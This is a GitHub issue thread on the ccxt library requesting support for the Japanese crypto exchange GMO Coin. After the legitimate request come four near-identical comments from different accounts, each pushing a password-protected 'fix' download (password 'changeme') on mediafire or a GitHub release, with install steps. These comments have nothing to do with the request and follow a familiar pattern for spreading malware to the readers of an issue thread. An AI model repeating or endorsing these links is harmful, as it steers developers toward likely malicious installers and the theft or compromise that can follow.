### ISSUE TITLE
new exchange request for GMO Coin crypto spot and margin trading api in Python, possiblely also for forex

### ISSUE THREAD

**Issue by tianqin1** [ccxt/ccxt#23440]
### Exchange Name

GMO Coin

### URL of the Exchange

https://coin.z.com/jp/

### URL of the Exchange's API docs

https://api.coin.z.com/docs/en/#end-point

### Why should this exchange be implemented?

Trading volume is comparable with Bitflyer and larger than Coincheck in Japan. Margin trading and forex are available with similar API format.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
